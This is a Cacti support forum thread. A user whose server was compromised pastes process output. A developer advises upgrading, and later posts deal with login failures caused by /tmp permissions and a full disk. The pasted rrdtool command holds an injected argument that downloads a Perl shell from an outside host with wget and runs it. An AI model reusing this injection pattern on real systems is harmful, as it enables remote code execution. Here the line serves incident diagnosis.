Hacked by Cacti?!?!?!

Post support questions that directly relate to Linux/Unix operating systems.

Moderators: Developers, Moderators

Post Reply
bparker
Posts: 6
Joined: Fri Jan 28, 2005 9:29 am

Hacked by Cacti?!?!?!

Post by bparker »

This should say it all:

# ps auxwwwef|./grep wget
www-data 10146 0.0 0.2 2512 1188 ? S 19:29 0:00 | \_ sh -c cd '/usr/share/cacti' ; /usr/bin/rrdtool graph - --imgformat=PNG --start=?wget cteam.3x.ro/shell.jpg -O /tmp/shell.pl;perl /tmp/shell.pl? --end=-300 --title="core - CPU Usage" --rigid --base=1000 --height=120 --width=500 --alt-autoscale-max --lower-limit=0 --vertical-label="percent" DEF:a="/usr/share/cacti/rra/core_cpu_system_565.rrd":cpu_system:AVERAGE DEF:b="/usr/share/cacti/rra/core_cpu_user_566.rrd":cpu_user:AVERAGE DEF:c="/usr/share/cacti/rra/core_cpu_nice_564.rrd":cpu_nice:AVERAGE CDEF:cdefbc=TIME,1124497454,GT,a,a,UN,0,a,IF,IF,TIME,1124497454,GT,b,b,UN,0,b,IF,IF,TIME,1124497454,GT,c,c,UN,0,c,IF,IF,+,+ AREA:a#FF0000:"System" GPRINT:a:LAST:"Current\:%8.2lf %s" GPRINT:a:AVERAGE:"Average\:%8.2lf %s" GPRINT:a:MAX:"Maximum\:%8.2lf %s\n" STACK:b#0000FF:"User" GPRINT:b:LAST:" Current\:%8.2lf %s" GPRINT:b:AVERAGE:"Average\:%8.2lf %s" GPRINT:b:MAX:"Maximum\:%8.2lf %s\n" STACK:c#00FF00:"Nice" GPRINT:c:LAST:" Current\:%8.2lf %s" GPRINT:c:AVERAGE:"Average\:%8.2lf %s" GPRINT:c:MAX:"Maximum\:%8.2lf %s\n" LINE1:cdefbc#000000:"Total" GPRINT:cdefbc:LAST:" Current\:%8.2lf %s" GPRINT:cdefbc:AVERAGE:"Average\:%8.2lf %s" GPRINT:cdefbc:MAX:"Maximum\:%8.2lf %s" LANG=C PATH=/bin:/usr/bin:/usr/local/bin SNMP_PERSISTENT_FILE=/dev/null


any suggestions on how to fix this please let me know immediately. Cacti is shut off completely for now. BTW I'm running 0.8.6b on Linux.
User avatar
TheWitness
Developer
Posts: 17007
Joined: Tue May 14, 2002 5:08 pm
Location: MI, USA
Contact:

Post by TheWitness »

Upgrade to Cacti 0.8.6f.
True understanding begins only when we realize how little we truly understand...

Life is an adventure, let yours begin with Cacti!

Author of dozens of Cacti plugins and customization's. Advocate of LAMP, MariaDB, IBM Spectrum LSF and the world of batch. Creator of IBM Spectrum RTM, author of quite a bit of unpublished work and most of Cacti's bugs.
_________________
Official Cacti Documentation
GitHub Repository with Supported Plugins
Percona Device Packages (no support)
Interesting Device Packages


For those wondering, I'm still here, but lost in the shadows. Yearning for less bugs. Who want's a Cacti 1.3/2.0? Streams anyone?
bparker
Posts: 6
Joined: Fri Jan 28, 2005 9:29 am

Post by bparker »

Can you please be more specific?

Are you telling me to upgrade to that version because it fixes this issue, or
are you just pointing out the fact that I'm running an old version?
User avatar
rony
Developer/Forum Admin
Posts: 6022
Joined: Mon Nov 17, 2003 6:35 pm
Location: Michigan, USA
Contact:

Post by rony »

He is telling you, because it fixes 2 know security issues.

Upgrade to 0.8.6f, it will resolve your security issues.
[size=117][i][b]Tony Roman[/b][/i][/size]
[size=84][i]Experience is what causes a person to make new mistakes instead of old ones.[/i][/size]
[size=84][i]There are only 3 way to complete a project: Good, Fast or Cheap, pick two.[/i][/size]
[size=84][i]With age comes wisdom, what you choose to do with it determines whether or not you are wise.[/i][/size]
bparker
Posts: 6
Joined: Fri Jan 28, 2005 9:29 am

Post by bparker »

OK, sorry about that. I just finished upgrading to 0.8.6f per docs/UPGRADE,
and it seemed to go without a hitch.

I can run cactid on the cmdline as the cacti user and it polls everything just fine.

My problem is, I cannot login to the web interface anymore. When I login
as admin, it goes right back to the login page again. And no it is not an incorrect password, I tried that and it specifically tells you the password is wrong. In this case it just keeps going right back to the login page when you enter the right password. I also had another normal non-admin user setup, and now when I try to login as them, I get a "too many redirections" error from my browser. Any help on resolving this? Thanks in advance.

EDIT: I doubled checked all the permissions. That does not seem to be the issue.
bparker
Posts: 6
Joined: Fri Jan 28, 2005 9:29 am

Post by bparker »

nevermind, I fixed it. I wasn't cacti permissions, it was /tmp permissions :P

chmod 1777 /tmp fixed the problem. Thanks for the help
User avatar
rony
Developer/Forum Admin
Posts: 6022
Joined: Mon Nov 17, 2003 6:35 pm
Location: Michigan, USA
Contact:

Post by rony »

Yah, invalid /tmp permissions causes session files to not be created, which will break logging in.

If your server was hacked, you might want to consider rebuilding it to just be completely sure.

Do you know what they did? How far they got? Have you checked the server for a rootkit?
[size=117][i][b]Tony Roman[/b][/i][/size]
[size=84][i]Experience is what causes a person to make new mistakes instead of old ones.[/i][/size]
[size=84][i]There are only 3 way to complete a project: Good, Fast or Cheap, pick two.[/i][/size]
[size=84][i]With age comes wisdom, what you choose to do with it determines whether or not you are wise.[/i][/size]
bparker
Posts: 6
Joined: Fri Jan 28, 2005 9:29 am

Post by bparker »

OK, everything has been working fine since the last post where I fixed the /tmp permissions, now the same thing is happening again, where it takes me right back to the login page after entering the correct user/pass, but only this time I wasn't hacked, and there are no traces of that left anymore anyway. Are there any other things to check for on what might be causing this? I tried to enable all php debugging/errorlevels I could but it does not produce one bit of debug output whatsoever. Any help is greatly appreciated.

EDIT: I triple-checked the /tmp permissions, and it's not that, this time :)

Looking in /tmp I see the sess_<somehash> files being created, so I doubt this issue is related to the that.
bparker
Posts: 6
Joined: Fri Jan 28, 2005 9:29 am

Post by bparker »

Seems I simply ran out of disk space, sorry :)
Post Reply

Who is online

Users browsing this forum: No registered users and 5 guests